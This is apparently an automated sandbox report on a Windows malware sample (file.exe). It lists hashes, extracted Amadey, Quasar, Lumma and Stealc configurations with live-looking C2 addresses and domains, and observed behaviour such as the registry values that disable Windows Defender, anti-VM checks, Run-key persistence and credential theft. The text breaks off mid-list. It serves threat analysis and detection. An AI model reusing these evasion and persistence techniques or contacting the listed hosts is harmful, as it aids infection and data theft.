Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-12-2024 21:04
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20241007-en
General
-
Target
file.exe
-
Size
3.2MB
-
MD5
8310dd77fc508989327b7242d9f00757
-
SHA1
0f47666d19e93f838bf9e2d67a1a0c42dd2561f2
-
SHA256
306e3f1775f8481fe89d3575b57d8bcab355e9d55d1b66cbf7b246f8bd2a3dd0
-
SHA512
279770c1ae7698765dca0a7d4cffb6695381f8513ac12283c6e77b80cfd198d2a16c1ed12854f17ca8f91089632bbae65278bf8d157ec01fc3538cdc4416e697
-
SSDEEP
49152:eKsUSrfMdl+qB2OAS4aNPTET48NqCnf9lZOUdcczoJ:eTUqMdQshAS4aNP58NqClPdw
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
quasar
1.4.1
Office04
45.200.148.155:6060
4b3820e0-d123-49d9-b51e-3c4daa4f6874
-
encryption_key
F8879E9B26846C57C99B6F152F74703E1CC15B8B
-
install_name
SecurityHealthSystray.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SecurityHealthSystray.exe
-
subdirectory
SubDir
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://atten-supporse.biz/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 62a5fb64be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 62a5fb64be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 62a5fb64be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 62a5fb64be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 62a5fb64be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 62a5fb64be.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/memory/3532-131-0x00000000001D0000-0x0000000000966000-memory.dmp family_quasar behavioral2/memory/3532-151-0x00000000001D0000-0x0000000000966000-memory.dmp family_quasar -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 62a5fb64be.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kelyBT9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bd3fd12845.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e3cc36291d.exe -
pid Process 4292 powershell.exe 3824 powershell.exe 4176 powershell.exe 2012 powershell.exe 1068 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kelyBT9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e3cc36291d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 62a5fb64be.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kelyBT9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bd3fd12845.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e3cc36291d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 62a5fb64be.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bd3fd12845.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Build.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5044 cmd.exe 5524 powershell.exe -
Executes dropped EXE 24 IoCs
pid Process 1076 skotes.exe 4284 main.exe 2924 main.exe 2016 Build.exe 3532 kelyBT9.exe 3096 hacn.exe 4032 based.exe 740 based.exe 2424 hacn.exe 4940 Build.exe 664 hacn.exe 3600 based.exe 1392 based.exe 3120 bd3fd12845.exe 2928 Build.exe 5204 hacn.exe 5244 based.exe 5508 based.exe 6052 e3cc36291d.exe 5940 skotes.exe 5428 7130386325.exe 2684 rar.exe 220 62a5fb64be.exe 908 skotes.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine e3cc36291d.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 62a5fb64be.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine kelyBT9.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine bd3fd12845.exe -
Loads dropped DLL 54 IoCs
pid Process 2924 main.exe 2924 main.exe 740 based.exe 740 based.exe 2424 hacn.exe 2424 hacn.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 740 based.exe 664 hacn.exe 664 hacn.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 1392 based.exe 5204 hacn.exe 5204 hacn.exe 1392 based.exe 1392 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe 5508 based.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 62a5fb64be.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 62a5fb64be.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bd3fd12845.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013272001\\bd3fd12845.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e3cc36291d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013273001\\e3cc36291d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7130386325.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013274001\\7130386325.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\62a5fb64be.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013275001\\62a5fb64be.exe" skotes.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 153 discord.com 154 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 149 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0009000000023c77-558.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 2932 tasklist.exe 1600 tasklist.exe 5668 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4468 file.exe 1076 skotes.exe 3532 kelyBT9.exe 3120 bd3fd12845.exe 6052 e3cc36291d.exe 5940 skotes.exe 220 62a5fb64be.exe 908 skotes.exe -
resource yara_rule behavioral2/files/0x0008000000023c07-55.dat upx behavioral2/files/0x0008000000023c00-69.dat upx behavioral2/files/0x0008000000023bff-68.dat upx behavioral2/files/0x0008000000023bfe-67.dat upx behavioral2/files/0x0008000000023bfd-66.dat upx behavioral2/files/0x0008000000023bfc-65.dat upx behavioral2/files/0x0008000000023c1f-64.dat upx behavioral2/files/0x0008000000023c19-63.dat upx behavioral2/files/0x0008000000023c06-62.dat upx behavioral2/memory/2924-59-0x00007FFCD91F0000-0x00007FFCD97DE000-memory.dmp upx behavioral2/memory/740-152-0x00007FFCD8930000-0x00007FFCD8F1E000-memory.dmp upx behavioral2/memory/740-183-0x00007FFCD8490000-0x00007FFCD84B4000-memory.dmp upx behavioral2/files/0x0007000000023c68-190.dat upx behavioral2/files/0x0007000000023c67-189.dat upx behavioral2/files/0x0007000000023c74-188.dat upx behavioral2/files/0x0007000000023c73-187.dat upx behavioral2/files/0x0007000000023c71-186.dat upx behavioral2/memory/740-198-0x00007FFCD8410000-0x00007FFCD8433000-memory.dmp upx behavioral2/memory/740-199-0x00007FFCD8290000-0x00007FFCD8406000-memory.dmp upx behavioral2/memory/740-202-0x00007FFCE9D40000-0x00007FFCE9D4D000-memory.dmp upx behavioral2/memory/740-205-0x00007FFCD7C30000-0x00007FFCD7CFD000-memory.dmp upx behavioral2/memory/740-206-0x00007FFCD8930000-0x00007FFCD8F1E000-memory.dmp upx behavioral2/memory/740-212-0x00007FFCD7AF0000-0x00007FFCD7C0C000-memory.dmp upx behavioral2/memory/740-213-0x00007FFCD8490000-0x00007FFCD84B4000-memory.dmp upx behavioral2/memory/1392-244-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp upx behavioral2/memory/740-252-0x00007FFCD8410000-0x00007FFCD8433000-memory.dmp upx behavioral2/memory/1392-251-0x00007FFCE9280000-0x00007FFCE928F000-memory.dmp upx behavioral2/memory/1392-250-0x00007FFCD7370000-0x00007FFCD7394000-memory.dmp upx behavioral2/memory/664-214-0x00007FFCD84C0000-0x00007FFCD892A000-memory.dmp upx behavioral2/memory/740-211-0x00007FFCE9B40000-0x00007FFCE9B4D000-memory.dmp upx behavioral2/memory/740-210-0x00007FFCD7C10000-0x00007FFCD7C24000-memory.dmp upx behavioral2/memory/2424-209-0x00007FFCD84C0000-0x00007FFCD892A000-memory.dmp upx behavioral2/memory/740-204-0x00007FFCD8230000-0x00007FFCD8263000-memory.dmp upx behavioral2/memory/740-203-0x00007FFCD7D00000-0x00007FFCD8222000-memory.dmp upx behavioral2/memory/740-200-0x00007FFCD8270000-0x00007FFCD8289000-memory.dmp upx behavioral2/memory/740-197-0x00007FFCD8440000-0x00007FFCD8459000-memory.dmp upx behavioral2/memory/740-196-0x00007FFCD8460000-0x00007FFCD848D000-memory.dmp upx behavioral2/memory/740-182-0x00007FFCEF200000-0x00007FFCEF20F000-memory.dmp upx behavioral2/memory/2424-181-0x00007FFCD84C0000-0x00007FFCD892A000-memory.dmp upx behavioral2/files/0x0008000000023c56-179.dat upx behavioral2/files/0x0008000000023c55-178.dat upx behavioral2/files/0x0008000000023c53-176.dat upx behavioral2/files/0x0007000000023c6b-170.dat upx behavioral2/files/0x0007000000023c63-166.dat upx behavioral2/files/0x0008000000023c5a-163.dat upx behavioral2/files/0x0008000000023c44-160.dat upx behavioral2/files/0x0007000000023c72-155.dat upx behavioral2/memory/740-320-0x00007FFCD7D00000-0x00007FFCD8222000-memory.dmp upx behavioral2/memory/740-319-0x00007FFCD8270000-0x00007FFCD8289000-memory.dmp upx behavioral2/memory/1392-333-0x00007FFCD1EA0000-0x00007FFCD2016000-memory.dmp upx behavioral2/memory/740-329-0x00007FFCD8230000-0x00007FFCD8263000-memory.dmp upx behavioral2/memory/1392-332-0x00007FFCD3580000-0x00007FFCD35A3000-memory.dmp upx behavioral2/memory/1392-331-0x00007FFCD35B0000-0x00007FFCD35C9000-memory.dmp upx behavioral2/memory/740-330-0x00007FFCD7C30000-0x00007FFCD7CFD000-memory.dmp upx behavioral2/memory/1392-328-0x00007FFCD35D0000-0x00007FFCD35FD000-memory.dmp upx behavioral2/memory/664-346-0x00007FFCD84C0000-0x00007FFCD892A000-memory.dmp upx behavioral2/memory/1392-345-0x00007FFCE8D80000-0x00007FFCE8D8D000-memory.dmp upx behavioral2/memory/1392-344-0x00007FFCD3020000-0x00007FFCD3039000-memory.dmp upx behavioral2/memory/1392-350-0x00007FFCD2440000-0x00007FFCD2473000-memory.dmp upx behavioral2/memory/1392-349-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp upx behavioral2/memory/1392-348-0x00007FFCD1DD0000-0x00007FFCD1E9D000-memory.dmp upx behavioral2/memory/1392-347-0x00007FFCCEE00000-0x00007FFCCF322000-memory.dmp upx behavioral2/memory/1392-369-0x00007FFCE8D40000-0x00007FFCE8D4D000-memory.dmp upx behavioral2/memory/1392-368-0x00007FFCD8620000-0x00007FFCD8634000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job file.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral2/files/0x000a000000023b97-31.dat pyinstaller behavioral2/files/0x000a000000023c05-97.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5208 3120 WerFault.exe 135 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kelyBT9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bd3fd12845.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3cc36291d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 7130386325.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 62a5fb64be.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7130386325.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 7130386325.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5636 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5696 systeminfo.exe -
Kills process with taskkill 5 IoCs
pid Process 5052 taskkill.exe 4656 taskkill.exe 5928 taskkill.exe 4812 taskkill.exe 6124 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2124 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 51 IoCs
pid Process 4468 file.exe 4468 file.exe 1076 skotes.exe 1076 skotes.exe 3532 kelyBT9.exe 3532 kelyBT9.exe 2012 powershell.exe 2012 powershell.exe 4292 powershell.exe 4292 powershell.exe 3120 bd3fd12845.exe 3120 bd3fd12845.exe 2012 powershell.exe 1068 powershell.exe 1068 powershell.exe 5524 powershell.exe 5524 powershell.exe 5524 powershell.exe 4292 powershell.exe 4292 powershell.exe 5688 powershell.exe 5688 powershell.exe 1068 powershell.exe 6052 e3cc36291d.exe 6052 e3cc36291d.exe 5688 powershell.exe 5940 skotes.exe 5940 skotes.exe 3824 powershell.exe 3824 powershell.exe 3824 powershell.exe 5616 powershell.exe 5616 powershell.exe 5616 powershell.exe 5428 7130386325.exe 5428 7130386325.exe 4176 powershell.exe 4176 powershell.exe 4176 powershell.exe 220 62a5fb64be.exe 220 62a5fb64be.exe 6064 powershell.exe 6064 powershell.exe 6064 powershell.exe 5428 7130386325.exe 5428 7130386325.exe 220 62a5fb64be.exe 220 62a5fb64be.exe 220 62a5fb64be.exe 908 skotes.exe 908 skotes.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3532 kelyBT9.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeDebugPrivilege 4292 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1600 tasklist.exe Token: SeDebugPrivilege 2932 tasklist.exe Token: SeIncreaseQuotaPrivilege 5660 WMIC.exe Token: SeSecurityPrivilege 5660 WMIC.exe Token: SeTakeOwnershipPrivilege 5660 WMIC.exe Token: SeLoadDriverPrivilege 5660 WMIC.exe Token: SeSystemProfilePrivilege 5660 WMIC.exe Token: SeSystemtimePrivilege 5660 WMIC.exe Token: SeProfSingleProcessPrivilege 5660 WMIC.exe Token: SeIncBasePriorityPrivilege 5660 WMIC.exe Token: SeCreatePagefilePrivilege 5660 WMIC.exe Token: SeBackupPrivilege 5660 WMIC.exe Token: SeRestorePrivilege 5660 WMIC.exe Token: SeShutdownPrivilege 5660 WMIC.exe Token: SeDebugPrivilege 5660 WMIC.exe Token: SeSystemEnvironmentPrivilege 5660 WMIC.exe Token: SeRemoteShutdownPrivilege 5660 WMIC.exe Token: SeUndockPrivilege 5660 WMIC.exe Token: SeManageVolumePrivilege 5660 WMIC.exe Token: 33 5660 WMIC.exe Token: 34 5660 WMIC.exe Token: 35 5660 WMIC.exe Token: 36 5660 WMIC.exe Token: SeDebugPrivilege 5524 powershell.exe Token: SeDebugPrivilege 5668 tasklist.exe Token: SeDebugPrivilege 5688 powershell.exe Token: SeIncreaseQuotaPrivilege 5660 WMIC.exe Token: SeSecurityPrivilege 5660 WMIC.exe Token: SeTakeOwnershipPrivilege 5660 WMIC.exe Token: SeLoadDriverPrivilege 5660 WMIC.exe Token: SeSystemProfilePrivilege 5660 WMIC.exe Token: SeSystemtimePrivilege 5660 WMIC.exe Token: SeProfSingleProcessPrivilege 5660 WMIC.exe Token: SeIncBasePriorityPrivilege 5660 WMIC.exe Token: SeCreatePagefilePrivilege 5660 WMIC.exe Token: SeBackupPrivilege 5660 WMIC.exe Token: SeRestorePrivilege 5660 WMIC.exe Token: SeShutdownPrivilege 5660 WMIC.exe Token: SeDebugPrivilege 5660 WMIC.exe Token: SeSystemEnvironmentPrivilege 5660 WMIC.exe Token: SeRemoteShutdownPrivilege 5660 WMIC.exe Token: SeUndockPrivilege 5660 WMIC.exe Token: SeManageVolumePrivilege 5660 WMIC.exe Token: 33 5660 WMIC.exe Token: 34 5660 WMIC.exe Token: 35 5660 WMIC.exe Token: 36 5660 WMIC.exe Token: SeDebugPrivilege 3824 powershell.exe Token: SeDebugPrivilege 5616 powershell.exe Token: SeDebugPrivilege 5052 taskkill.exe Token: SeDebugPrivilege 4656 taskkill.exe Token: SeDebugPrivilege 5928 taskkill.exe Token: SeDebugPrivilege 4812 taskkill.exe Token: SeDebugPrivilege 6124 taskkill.exe Token: SeIncreaseQuotaPrivilege 6076 WMIC.exe Token: SeSecurityPrivilege 6076 WMIC.exe Token: SeTakeOwnershipPrivilege 6076 WMIC.exe Token: SeLoadDriverPrivilege 6076 WMIC.exe Token: SeSystemProfilePrivilege 6076 WMIC.exe Token: SeSystemtimePrivilege 6076 WMIC.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 4468 file.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5976 firefox.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe 5428 7130386325.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5976 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4468 wrote to memory of 1076 4468 file.exe 83 PID 4468 wrote to memory of 1076 4468 file.exe 83 PID 4468 wrote to memory of 1076 4468 file.exe 83 PID 1076 wrote to memory of 4284 1076 skotes.exe 97 PID 1076 wrote to memory of 4284 1076 skotes.exe 97 PID 4284 wrote to memory of 2924 4284 main.exe 98 PID 4284 wrote to memory of 2924 4284 main.exe 98 PID 2924 wrote to memory of 1208 2924 main.exe 99 PID 2924 wrote to memory of 1208 2924 main.exe 99 PID 1208 wrote to memory of 2016 1208 cmd.exe 102 PID 1208 wrote to memory of 2016 1208 cmd.exe 102 PID 1208 wrote to memory of 2016 1208 cmd.exe 102 PID 1076 wrote to memory of 3532 1076 skotes.exe 104 PID 1076 wrote to memory of 3532 1076 skotes.exe 104 PID 1076 wrote to memory of 3532 1076 skotes.exe 104 PID 2016 wrote to memory of 3096 2016 Build.exe 106 PID 2016 wrote to memory of 3096 2016 Build.exe 106 PID 2016 wrote to memory of 4032 2016 Build.exe 109 PID 2016 wrote to memory of 4032 2016 Build.exe 109 PID 4032 wrote to memory of 740 4032 based.exe 110 PID 4032 wrote to memory of 740 4032 based.exe 110 PID 3096 wrote to memory of 2424 3096 hacn.exe 111 PID 3096 wrote to memory of 2424 3096 hacn.exe 111 PID 2424 wrote to memory of 4280 2424 hacn.exe 112 PID 2424 wrote to memory of 4280 2424 hacn.exe 112 PID 740 wrote to memory of 4060 740 based.exe 115 PID 740 wrote to memory of 4060 740 based.exe 115 PID 4280 wrote to memory of 4940 4280 cmd.exe 114 PID 4280 wrote to memory of 4940 4280 cmd.exe 114 PID 4280 wrote to memory of 4940 4280 cmd.exe 114 PID 740 wrote to memory of 1216 740 based.exe 116 PID 740 wrote to memory of 1216 740 based.exe 116 PID 740 wrote to memory of 2020 740 based.exe 118 PID 740 wrote to memory of 2020 740 based.exe 118 PID 4940 wrote to memory of 664 4940 Build.exe 121 PID 4940 wrote to memory of 664 4940 Build.exe 121 PID 2020 wrote to memory of 1068 2020 cmd.exe 122 PID 2020 wrote to memory of 1068 2020 cmd.exe 122 PID 1216 wrote to memory of 4292 1216 cmd.exe 124 PID 1216 wrote to memory of 4292 1216 cmd.exe 124 PID 4060 wrote to memory of 2012 4060 cmd.exe 123 PID 4060 wrote to memory of 2012 4060 cmd.exe 123 PID 4940 wrote to memory of 3600 4940 Build.exe 127 PID 4940 wrote to memory of 3600 4940 Build.exe 127 PID 740 wrote to memory of 3576 740 based.exe 126 PID 740 wrote to memory of 3576 740 based.exe 126 PID 740 wrote to memory of 3488 740 based.exe 125 PID 740 wrote to memory of 3488 740 based.exe 125 PID 3600 wrote to memory of 1392 3600 based.exe 129 PID 3600 wrote to memory of 1392 3600 based.exe 129 PID 664 wrote to memory of 4844 664 hacn.exe 130 PID 664 wrote to memory of 4844 664 hacn.exe 130 PID 3532 wrote to memory of 2124 3532 kelyBT9.exe 133 PID 3532 wrote to memory of 2124 3532 